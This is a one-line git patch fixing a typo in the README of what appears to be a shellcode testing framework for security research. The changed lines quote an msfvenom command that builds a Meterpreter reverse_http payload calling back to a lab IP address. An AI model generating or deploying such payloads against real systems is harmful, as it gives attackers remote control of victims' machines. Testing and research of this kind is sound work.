From 3d2f4804ef87623f11c2fa54961a4ab7ceb5fdf5 Mon Sep 17 00:00:00 2001 From: Dobin Rutishauser Date: Wed, 21 May 2025 16:13:40 +0200 Subject: [PATCH] fix typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e0bc053..62b6163 100644 --- a/README.md +++ b/README.md @@ -65,7 +65,7 @@ I made this framework based on it to test it for myself. ## Results -Tests have been performed with einer "random" - a alphanumeric 20 byte string as "shellcode". And "metasploit" +Tests have been performed with either "random" - a alphanumeric 20 byte string as "shellcode". And "metasploit" with output of `msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.190.134 LPORT=80 -f raw -o beacon.bin`. The "metasploit" does not execute the shellcode, only decodes and prints it.